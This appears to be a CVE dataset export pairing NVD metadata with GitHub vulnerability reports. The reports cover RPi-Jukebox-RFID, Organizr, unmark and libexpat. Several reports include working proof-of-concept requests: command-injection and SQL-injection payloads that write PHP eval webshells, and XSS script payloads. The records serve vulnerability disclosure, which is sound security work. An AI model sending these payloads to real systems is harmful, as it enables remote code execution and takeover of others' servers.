{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2396" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2396
[ "Exploit", "Issue Tracking" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\inc.setWlanIpMail.php ```php if(isset($_POST['WlanIpMailYN']) && trim($_POST['WlanIpMailYN']) != "") { // Line 16(check point) if(trim($_POST['WlanIpMailYN']) == "ON") { // Line 20-26 (check point) // break } elseif(trim($_POST['WlanIpMailYN']) == "OFF") { // Line 27-34 (check point) // break } $WlanIpMailAddr = trim($_POST['WlanIpMailAddr']); // Line 36(Source) $exec = 'echo "'.$WlanIpMailAddr.'" > '.$conf['settings_abs'].'/WlanIpMailAddr'; exec($exec); // Line 41(Sink) } ``` Source from Line 36 (`$_POST['WlanIpMailAddr']`). And then there are three check point ,which we should set `$_POST['WlanIpMailYN'] = 1` to bypass. After bypass three check point, the source(tainted) pass to `$WlanIpMailAddr` and `exec($exec);`(Line 52) without another check. # Poc `POST /htdocs/inc.setWlanIpMail.php ` Data: `WlanIpMailYN=1&WlanIpMailAddr=hello%22+%3b+echo+%22%3c%3fphp+%40eval(%24_POST%5b%27pass%27%5d)+%3f%3e%22++%3e+.%2fshell.php++%3b+echo+%22hello` Here is Data without url encoding for ease of understanding: `WlanIpMailYN=1&WlanIpMailAddr=hello" ; echo "<?php @eval($_POST['pass']) ?>" > ./shell.php ; echo "hello` # Manual verification ![1](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/99845080-ee76-43c3-90e0-a6b046c0c78e) ![2](https://github.com/MiczFlor/RPi-Jukebox-RFID/assets/134520528/78a60d43-ef11-4753-860a-7bdd76d63b67) The attacker can then easily connect to this webshell(/htdocs/shell.php) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_1
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2396/comments
3
2024-07-11T17:29:32Z
2024-07-13T09:15:46Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2396
2,403,698,799
2,396
6,243
CVE-2024-41369
2024-08-29T20:15:09.350
RPi-Jukebox-RFID v2.7.0 was discovered to contain a remote code execution (RCE) vulnerability via htdocs\inc.setWifi.php
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2401" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sourcefabric:phoniebox:2.7.0:*:*:*:*:*:*:*", "matchCriteriaId": "5D8F3672-D6B8-4655-908F-417A730F8081", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "94" ]
94
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2401
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MiczFlor", "RPi-Jukebox-RFID" ]
### Version v2.7.0 ### Branch released ### OS ubuntu 22 ### Pi model unknown ### Hardware _No response_ ### What happened? Hello, I would like to report for a RCE vulnerability in RPi-Jukebox-RFID-v2.7(**No permissions required**) # Analysis The path of the vulnerability: htdocs\inc.setWifi.php ```php # htdocs\inc.setWifi.php if(isset($_POST["submitWifi"]) && $_POST["submitWifi"] == "submit") { // Line 8(Check point) $exec = "bash -e <<'END'\n"; $exec .= "source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh\n"; $exec .= "clear_wireless_networks\n"; $tempPOST = $_POST; // Line 14 (Source) $_POST=array(); //clear foreach ( $tempPOST as $post_key => $post_value ) { unset($temp_ssid); unset($temp_pass); unset($temp_prio); if ( substr(trim($post_key), 0, 9) == "WIFIssid_" ) { // Line 20(check for temp_ssid) $temp_ssid = trim($post_value); $post_key = "WIFIpass_".substr(trim($post_key), 9); // Line 22(check for temp_pass) $post_value = $tempPOST[$post_key]; $temp_pass = trim($post_value); $post_key = "WIFIprio_".substr(trim($post_key), 9); // Line 25(check for temp_prio) $post_value = $tempPOST[$post_key]; $temp_prio = trim($post_value); if (isset($temp_ssid) && $temp_ssid != "" && isset($temp_pass) && strlen($temp_pass) >= 8) { // Line 28 if(!isset($temp_prio) || !is_numeric($temp_prio)) { $temp_prio = 0; } $exec .= "add_wireless_network wlan0 ".$temp_ssid." ".$temp_pass." ".$temp_prio."\n"; } } } $exec .= "END\n"; exec("sudo bash -c '". $exec . "'"); // Line 38(Sink) } ``` Source from Line 14 (`$_POST` ) . And then there is a check point(Line 8) ,which we should set `$_POST['submitWifi'] = submit` to bypass. Finally, the sink point executed a complex concatenated command(Line 38). Let's briefly analyze this splicing command: ```bash sudo bash -c 'bash -e <<'END' source ".$conf['scripts_abs']."/helperscripts/inc.networkHelper.sh clear_wireless_networks add_wireless_network wlan0 $temp_ssid $temp_pass $temp_prio END 'z ``` We have three controllable variables(`$temp_ssid, $temp_pass, $temp_prio`), but they need to meet the corresponding checks(Line 20, Line 22, Line25 and Line 28). It can be seen that the condition we need to meet is to use KEY values with prefixes `WIFIssid_`, `WIFIpass_`, and `WIFIprio_`, and `strlen($temp_pass) >= 8`. In addition, since we are using `bash -e` mode, we must ensure that all commands before controllable points can be executed correctly. That is, we need to find the correct value for `$conf['scripts_abs']` which can be found in the htdocs/settings.php ```php # htdocs/settings.php include("inc.header.php"); // Line 3 (init $conf['scripts_abs']) ... include("inc.setWifi.php"); // Line 191 ``` So we need to POST htdocs/settings. php # Poc `POST /htdocs/settings.php ` Data: `submitWifi=submit&WIFIssid_123=+%7c%7c+echo+%22%3c%3fphp+%40eval(%5c%5c%5c%24_POST%5b%5c%22shell6%5c%22%5d)%3b+%3f%3e%22+%3e+.%2fshell6.php+&WIFIpass_123=%7c%7c+echo+%221%22+%7c%7c+&WIFIprio_123=1` Here is the version without url encoding for ease of understanding: `submitWifi=submit&WIFIssid_123= || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php &WIFIpass_123=|| echo "1" || &WIFIprio_123=1` The concatenated command: ```bash sudo bash -c 'bash -e <<'END' source /www/admin/cms.jukebox27.com_80/wwwroot/scripts/helperscripts/inc.networkHelper.sh clear_wireless_networks add_wireless_network wlan0 || echo "<?php @eval(\\\$_POST[\"shell6\"]); ?>" > ./shell6.php || echo "1" || 1 END ' ``` # Manual verification ![21](https://github.com/user-attachments/assets/5c52d295-0b6a-41fd-9379-009e0fd3a8ae) ![22](https://github.com/user-attachments/assets/9083c1c0-7875-46bc-9f69-a3c2b493f7b5) ![23](https://github.com/user-attachments/assets/a7a48c13-6e6f-4179-bac0-56cae606f130) ### Logs _No response_ ### Configuration _No response_ ### More info _No response_
🐛 | RPi-Jukebox-RFID V2.7_RCE_6
https://api.github.com/repos/MiczFlor/RPi-Jukebox-RFID/issues/2401/comments
0
2024-07-12T06:08:17Z
2024-07-12T06:08:32Z
https://github.com/MiczFlor/RPi-Jukebox-RFID/issues/2401
2,404,828,568
2,401
6,244
CVE-2024-41370
2024-08-29T20:15:09.433
Organizr v1.90 was discovered to contain a SQL injection vulnerability via chat/setlike.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/causefx/Organizr" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/causefx/Organizr/issues/1998" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:organizr:organizr:1.90:*:*:*:*:*:*:*", "matchCriteriaId": "4B3D3C6A-EA37-41D2-8289-A9EAFCF3CA7F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/causefx/Organizr/issues/1998
[ "Exploit", "Issue Tracking" ]
github.com
[ "causefx", "Organizr" ]
Hello, I would like to report for a Sqli vulnerability in Organizr-v1.9, This vulnerability can lead to RCE. # Analysis The path of the vulnerability: chat/setlike.php ```php $messageid = $_POST["messageid"]; // Line 3(Source) ... $db->exec("UPDATE chatpack_log SET liked='0' WHERE id='$messageid'"); // Line 36(Sink) ``` There is no checking or filtering between the source and sink, which resulting SQLI vulnerabilities. # Permission Description The vulnerability itself does not require any permission.(**No permissions required**) However, the initial state of Organizer-v1.9 did not enable Chat, causing the data table "chatpack-log" to not exist. To turn on this switch, administrator privileges are required. You can open it in the management menu or by sending the following request `POST /ajax.php?a=update-config` Data: `authType=internal&chat=true` Then visit http://url/chat.php and enter somethings(**No permissions required**), and Now we got table "chatpack-log". # Poc `POST /chat/setlike.php ` Data: `messageid=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[whoami]);?>\r\n\r\n' ); /* ` Note that we used this vulnerability to write a webshell named shell.php to the server, which actually caused RCE. # Manual verification ![3](https://github.com/user-attachments/assets/5a4754ed-8166-4ed5-8f08-a0b9df1f2c92) ![4](https://github.com/user-attachments/assets/7a9d2f64-693c-4820-82e3-1fa9b1dbdec0)
SQLI(RCE)_1 in Organizr-v1.9
https://api.github.com/repos/causefx/Organizr/issues/1998/comments
1
2024-07-12T14:27:54Z
2024-07-12T16:08:52Z
https://github.com/causefx/Organizr/issues/1998
2,405,740,963
1,998
6,245
CVE-2024-41371
2024-08-29T20:15:09.493
Organizr v1.90 is vulnerable to Cross Site Scripting (XSS) via api.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/causefx/Organizr" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/causefx/Organizr/issues/1997" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:organizr:organizr:1.90:*:*:*:*:*:*:*", "matchCriteriaId": "4B3D3C6A-EA37-41D2-8289-A9EAFCF3CA7F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/causefx/Organizr/issues/1997
[ "Exploit", "Issue Tracking" ]
github.com
[ "causefx", "Organizr" ]
Hello, I would like to report for a xss vulnerability in Organizr-v1.9 (**No permissions required**) # Analysis The path of the vulnerability: api.php ```php if (isset($_GET['a'])) { $action = $_GET['a']; } // Line 9(Source) if (isset($_GET['k'])) { $key = $_GET['k']; } // Line 10 ... if (!isset($key)) { // Line 19-25(Check point) $result['error'] = "No API Key Set"; exit(json_encode($result)); }elseif (strtolower(ORGANIZRAPI) != strtolower($key)) { $result['error'] = "API Key mismatch"; exit(json_encode($result)); } ... default: $result = "$action Not Defined As API Function"; // Line 69(Tainted) exit(json_encode($result)); // Line 79(Sink) ``` Source from Line 9 (`$_GET['a']`). And then there is a check point ,which we should set `$_POST['k']=`(because `ORGANIZRAPI==''`) to bypass. After bypass the check point, the source(tainted) pass to `$result` and `exit(json_encode($result));`(Line 79) without another check. # Poc `GET /api.php?a=%3Cimg%20src=x%20onerror=alert(123);%3E&k=` Here is the version without url encoding for ease of understanding: `GET /api.php?a=<img src=x onerror=alert(123);>&k=` # Manual verification ![1](https://github.com/user-attachments/assets/879403ca-36ff-4f00-9e8a-f2e536ea8dbe) ![2](https://github.com/user-attachments/assets/578d413f-868e-41c4-b3ee-45121e5585b9)
xxs in Organizr-v1.9
https://api.github.com/repos/causefx/Organizr/issues/1997/comments
1
2024-07-12T14:27:53Z
2024-07-12T16:08:42Z
https://github.com/causefx/Organizr/issues/1997
2,405,740,841
1,997
6,246
CVE-2024-41372
2024-08-29T20:15:09.553
Organizr v1.90 was discovered to contain a SQL injection vulnerability via chat/settyping.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://github.com/causefx/Organizr" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/causefx/Organizr/issues/1999" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:organizr:organizr:1.90:*:*:*:*:*:*:*", "matchCriteriaId": "4B3D3C6A-EA37-41D2-8289-A9EAFCF3CA7F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/causefx/Organizr/issues/1999
[ "Exploit", "Issue Tracking" ]
github.com
[ "causefx", "Organizr" ]
Hello, I would like to report for a Sqli vulnerability in Organizr-v1.9, This vulnerability can lead to RCE. # Analysis The path of the vulnerability: chat/settyping.php ```php $data = $_POST["datavars"]; // Line 3(Source) $dataarray = explode("###", $data); $user = $dataarray[0]; $settyping = $dataarray[1]; ... else if( $settyping == 0 ) // Line 44 (check Point) { $db->exec("DELETE FROM chatpack_typing WHERE user='$user'");// Line 46(Sink) } ``` There is no checking or filtering between the source and sink, which resulting SQLI vulnerabilities. We only need to submit a form such as `$_POST["datavars"]=user###settping`, and the let `settping==0` # Permission Description The vulnerability itself does not require any permission.(**No permissions required**) However, the initial state of Organizer-v1.9 did not enable Chat, causing the data table "chatpack-log" to not exist. To turn on this switch, administrator privileges are required. You can open it in the management menu or by sending the following request `POST /ajax.php?a=update-config` Data: `authType=internal&chat=true` Then visit http://url/chat.php and enter somethings(**No permissions required**), and Now we got table "chatpack-log". # Poc `POST /chat/settyping.php ` Data: `datavars=1'; ATTACH DATABASE 'D:\phpstudy_pro\WWW\cms.organizr19.com\shell2.php' AS shell;create TABLE shell.exp (webshell text);insert INTO shell.exp (webshell) VALUES ('\r\n\r\n<?php eval($_POST[shell2]);?>\r\n\r\n' ); /*###0` Note that we used this vulnerability to write a webshell named shell2.php to the server, which actually caused RCE. # Manual verification ![5](https://github.com/user-attachments/assets/c2b5c0fa-8b4b-4c94-b536-ba4f9626f54a) ![6](https://github.com/user-attachments/assets/b8964f83-11f0-4d12-a7cf-c9d1f3c3c815)
SQLI(RCE)_2 in Organizr-v1.9
https://api.github.com/repos/causefx/Organizr/issues/1999/comments
3
2024-07-12T14:27:57Z
2024-07-12T16:09:04Z
https://github.com/causefx/Organizr/issues/1999
2,405,741,088
1,999
6,247
CVE-2024-41349
2024-08-29T21:15:10.433
unmark 1.9.2 is vulnerable to Cross Site Scripting (XSS) via application/views/marks/add_by_url.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/cdevroe/unmark/issues/290" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:cdevroe:unmark:1.9.2:*:*:*:*:*:*:*", "matchCriteriaId": "04DDDEEB-EC3D-4E0A-9DD9-C0B078E5B5C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/cdevroe/unmark/issues/290
[ "Exploit", "Issue Tracking" ]
github.com
[ "cdevroe", "unmark" ]
Hello, I would like to report for a xss vulnerability in unmark-1.9.2. The path of the vulnerability. In file application/views/marks/add_by_url.php ```php if ( $_POST ) : // Line 3 $url = $_POST['url']; // Line 7 echo '<p><strong>URL:</strong>' . $url . '</p>'; // Line 8 ``` We see that there is no check between the input $_POST["url"] and the output(Line 8) Thus the XSS will happen at `echo '<p><strong>URL:</strong>' . $url . '</p>';` Poc: POST /marks/add_by_url `add_from_url=1&url=</p><script>alert('xss')</script>` Manual verification: ![1](https://github.com/cdevroe/unmark/assets/134520528/1e797aad-4120-4788-9efa-21c5e7f58fc7) ![2](https://github.com/cdevroe/unmark/assets/134520528/7b87ab42-5e79-415b-bcca-bdbc92082df5)
XSS vulnerability
https://api.github.com/repos/cdevroe/unmark/issues/290/comments
0
2024-07-09T12:10:19Z
2024-07-09T12:10:19Z
https://github.com/cdevroe/unmark/issues/290
2,398,031,234
290
6,248
CVE-2024-45490
2024-08-30T03:15:03.757
An issue was discovered in libexpat before 2.6.3. xmlparse.c does not reject a negative length for XML_ParseBuffer.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/libexpat/libexpat/issues/887" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/libexpat/libexpat/pull/890" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20241018-0004/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDDF6E7A-AF1C-4370-B0B0-29A35C454FFB", "versionEndExcluding": "2.6.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "611" ]
611
https://github.com/libexpat/libexpat/issues/887
[ "Issue Tracking" ]
github.com
[ "libexpat", "libexpat" ]
`xmlparse.c` does not reject a negative length for `XML_ParseBuffer()`, which may cause memory corruption or code execution.
CVE-2024-45490
https://api.github.com/repos/libexpat/libexpat/issues/887/comments
3
2024-08-26T03:42:05Z
2024-09-05T01:22:57Z
https://github.com/libexpat/libexpat/issues/887
2,485,799,902
887
6,249
CVE-2024-45491
2024-08-30T03:15:03.850
An issue was discovered in libexpat before 2.6.3. dtdCopy in xmlparse.c can have an integer overflow for nDefaultAtts on 32-bit platforms (where UINT_MAX equals SIZE_MAX).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking" ], "url": "https://github.com/libexpat/libexpat/issues/888" }, { "source": "cve@mitre.org", "tags": [ "Patch" ], "url": "https://github.com/libexpat/libexpat/pull/891" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20241018-0003/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:libexpat_project:libexpat:*:*:*:*:*:*:*:*", "matchCriteriaId": "FDDF6E7A-AF1C-4370-B0B0-29A35C454FFB", "versionEndExcluding": "2.6.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "190" ]
190
https://github.com/libexpat/libexpat/issues/888
[ "Issue Tracking" ]
github.com
[ "libexpat", "libexpat" ]
`xmlparse.c` has an integer overflow for `nDefaultAtts` on 32-bit platforms, which may cause denial of service or code execution.
CVE-2024-45491
https://api.github.com/repos/libexpat/libexpat/issues/888/comments
1
2024-08-26T03:42:28Z
2024-09-05T01:23:40Z
https://github.com/libexpat/libexpat/issues/888
2,485,800,340
888
6,250
CVE-2024-45492
2024-08-30T03:15:03.930
An issue was discovered in libexpat before 2.6.3. nextScaffoldPart in xmlparse.c can have an integer overflow for m_groupSize on 32-bit platforms (where UINT_MAX equals SIZE_MAX).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.4, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
